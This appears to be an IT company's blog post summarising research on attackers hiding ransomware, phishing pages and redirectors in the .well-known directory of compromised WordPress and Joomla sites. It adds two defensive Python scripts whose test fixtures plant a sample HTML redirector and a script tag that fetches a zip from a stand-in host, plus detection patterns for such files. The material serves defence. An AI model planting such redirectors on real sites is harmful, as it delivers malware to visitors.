Compromised WordPress and Joomla websites are being used to deliver ransomware and malware


Hackers are using websites built on WordPress and Joomla, two of the most popular content management systems used in publishing, to deliver ransomware and other malware to visitors.

The hackers are exploiting vulnerabilities in WordPress and Joomla themes, plugins and extensions, then using the compromised sites to host ransomware, phishing pages, backdoors, and redirectors.

Researchers have recently seen a spike in the number of domains that have been compromised and used to push this malicious content onto unsuspecting visitors.

These attacks make use of a hidden directory on HTTPS sites: the `.well-known` directory. Website owners commonly use this directory to prove ownership of their domain to a certificate authority, which fetches a validation file from it to confirm that the domain is under the requester's control before issuing a certificate.

Cybercriminals, however, are using exploits to gain write access to this hidden directory, where they can stash malware and other malicious content out of sight of website administrators, who rarely look there.
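Because legitimate domain-validation files are tiny plain-text tokens, anything else sitting under `.well-known` is worth a look. The following is an added example (not code from the original post or from the Zscaler research) of a hunting script that walks a site's `.well-known` directory and flags files that do not look like validation tokens. It assumes the document root is on the local filesystem and uses the standard `acme-challenge` and `pki-validation` subdirectory names; the sample tree it builds is constructed for the demonstration.

```python
"""Hunt for files planted under a web root's .well-known directory.

Added example, not code from the original post or from Zscaler. It assumes
the site's document root is on the local filesystem; the sample tree built
by build_sample_tree() is constructed for the demonstration.

Legitimate domain-validation files (ACME HTTP-01 tokens under
acme-challenge, or the pki-validation files some CAs use) are short
plain-text tokens. HTML redirectors, zip archives, scripts or PHP files
have no business there.
"""
import os
import re
import tempfile
from pathlib import Path

# Extensions that never appear in a domain-validation directory
SUSPICIOUS_EXT = {".zip", ".js", ".html", ".htm", ".php", ".exe", ".jar"}
# Byte signatures: ZIP archive header and HTML/script markup
ZIP_MAGIC = b"PK\x03\x04"
HTML_PATTERN = re.compile(rb"<\s*(html|script|meta)\b", re.IGNORECASE)
# ACME HTTP-01 key authorization is "token.thumbprint" in base64url characters
TOKEN_PATTERN = re.compile(rb"^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)?\s*$")
MAX_TOKEN_SIZE = 256


def classify(path: Path) -> str:
    """Return 'ok' for a plausible validation token, else a reason string."""
    if path.suffix.lower() in SUSPICIOUS_EXT:
        return f"suspicious extension {path.suffix}"
    data = path.read_bytes()
    if data.startswith(ZIP_MAGIC):
        return "zip archive"
    if HTML_PATTERN.search(data):
        return "html/script content"
    if len(data) > MAX_TOKEN_SIZE:
        return f"oversized ({len(data)} bytes)"
    if not TOKEN_PATTERN.match(data):
        return "not a validation token"
    return "ok"


def hunt(webroot: str) -> dict:
    """Walk <webroot>/.well-known; return {relative_path: finding} for suspicious files."""
    base = Path(webroot) / ".well-known"
    findings = {}
    if not base.is_dir():
        return findings
    for root, _dirs, files in os.walk(base):
        for name in files:
            p = Path(root) / name
            verdict = classify(p)
            if verdict != "ok":
                rel = str(p.relative_to(base)).replace(os.sep, "/")
                findings[rel] = verdict
    return findings


def build_sample_tree() -> str:
    """Construct a throwaway web root (constructed data, not from a real site)."""
    root = tempfile.mkdtemp(prefix="wellknown-hunt-")
    acme = Path(root) / ".well-known" / "acme-challenge"
    acme.mkdir(parents=True)
    # A legitimate-looking ACME token file (constructed token and thumbprint)
    (acme / "gfj9Xq-token").write_bytes(b"gfj9Xq-token.abc123_THUMB")
    # Planted HTML redirector and a zip archive, as described in the post
    (acme / "reg.html").write_bytes(
        b"<html><meta http-equiv='refresh' content='0;url=invoice.zip'>")
    (acme / "invoice.zip").write_bytes(ZIP_MAGIC + b"\x00" * 16)
    pki = Path(root) / ".well-known" / "pki-validation"
    pki.mkdir()
    # Innocent-looking name, but the body is script rather than a token
    (pki / "ssl.txt").write_bytes(
        b"<script>location='//example.invalid/x.zip'</script>")
    return root


if __name__ == "__main__":
    for rel, why in sorted(hunt(build_sample_tree()).items()):
        print(f"{rel}: {why}")
```

Run it against a real document root by calling `hunt("/var/www/html")` (path is an assumption; substitute the site's own). Checking content as well as extension matters: the last sample file has a harmless `.txt` name and would slip past an extension-only filter.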

The most common threat deployed in this way has been Shade ransomware, also known as Troldesh.

More than 500 websites have been compromised, and thousands of attempts have been made to infect users coming across those sites with ransomware, phishing links, and other malicious content.

Spam emails tied to these campaigns usually contain a link to an HTML redirector page hosted on the compromised site; when clicked, it downloads a malicious zip file. All the user needs to do is open the JavaScript file inside the zip, and that JavaScript downloads the ransomware from the compromised site and executes it on the victim's device.

Phishing pages are likewise hosted in these hidden domain-validation directories and are shown as pop-ups to fool the potential victim into entering their username and password.
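Every step of the chain just described (redirector page, zip archive, later the payload fetched by the JavaScript inside the zip) is a request to `/.well-known/` for a file type that domain validation never serves, so the delivery shows up in ordinary web-server access logs. The following is an added example (not code from the original post or from Zscaler) of detection logic that parses combined-format access logs, flags successful fetches of non-validation content under `/.well-known/`, and reports clients that walked the redirector-then-archive sequence. The log lines, client addresses and file names are constructed for the demonstration; the payload's extension is an assumption, since the post does not say what it is.

```python
"""Detect the .well-known delivery chain in web-server access logs.

Added example, not from the original post or from Zscaler. Assumes the
Apache/nginx "combined" log format; SAMPLE_LOG is constructed data with
RFC 5737 documentation addresses, and the .exe payload name is an assumption.
"""
import posixpath
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
WELL_KNOWN = "/.well-known/"
# File types that domain validation never serves, mapped to the chain stage they suggest
STAGE_BY_EXT = {
    ".html": "redirector", ".htm": "redirector",
    ".zip": "archive",
    ".js": "script",
    ".exe": "payload",  # assumption: the post does not name the payload's extension
}

# Constructed sample: one CA validation fetch, one victim walking the full chain,
# and one unrelated visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2019:09:12:01 +0000] "GET /.well-known/acme-challenge/Q9s7n2k-token HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; ACME)"
198.51.100.23 - - [10/Apr/2019:09:14:44 +0000] "GET /.well-known/acme-challenge/reg.html HTTP/1.1" 200 412 "-" "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.23 - - [10/Apr/2019:09:14:46 +0000] "GET /.well-known/acme-challenge/invoice.zip HTTP/1.1" 200 3881 "https://example.invalid/.well-known/acme-challenge/reg.html" "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.23 - - [10/Apr/2019:09:15:30 +0000] "GET /.well-known/pki-validation/payload.exe HTTP/1.1" 200 1249280 "-" "WinHttp"
192.0.2.88 - - [10/Apr/2019:09:20:02 +0000] "GET /index.php HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
"""


def parse(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def stage_of(path: str):
    """Map a request path to a chain stage, or None if it is not of interest."""
    if not path.startswith(WELL_KNOWN):
        return None
    clean = path.split("?", 1)[0]          # drop any query string
    _, ext = posixpath.splitext(clean)
    return STAGE_BY_EXT.get(ext.lower())


def detect(log_text: str) -> dict:
    """Return {client_ip: [(timestamp, stage, path), ...]} for successful (200)
    fetches of non-validation content under /.well-known/, in log order."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or rec["status"] != "200":
            continue
        stage = stage_of(rec["path"])
        if stage:
            hits[rec["ip"]].append((rec["ts"], stage, rec["path"]))
    return dict(hits)


def full_chains(hits: dict) -> list:
    """Clients that fetched a redirector and then an archive, in that order."""
    chains = []
    for ip, events in hits.items():
        stages = [s for _, s, _ in events]
        if ("redirector" in stages and "archive" in stages
                and stages.index("redirector") < stages.index("archive")):
            chains.append(ip)
    return chains


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for ip, events in hits.items():
        for ts, stage, path in events:
            print(f"{ip} {ts} {stage:<10} {path}")
    print("full chain:", full_chains(hits))
```

The CA's own fetch of the token file is not flagged because the token has no file extension, which is the normal shape of a validation file. Filtering on status 200 keeps the report to deliveries that actually succeeded; drop that check if you also want to see probing for files that were already cleaned up.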

The compromised WordPress sites run versions 4.8.9 to 5.1.1 and tend to be using outdated CMS themes or server-side software.

To read more about the technical analysis of the attacks, please see the link below.

As always, if we can be of help with your network or computer, give us a call here at RHYNO Networks. (855) 749-6648

https://www.zscaler.com/blogs/research/abuse-hidden-well-known-directory-https-sites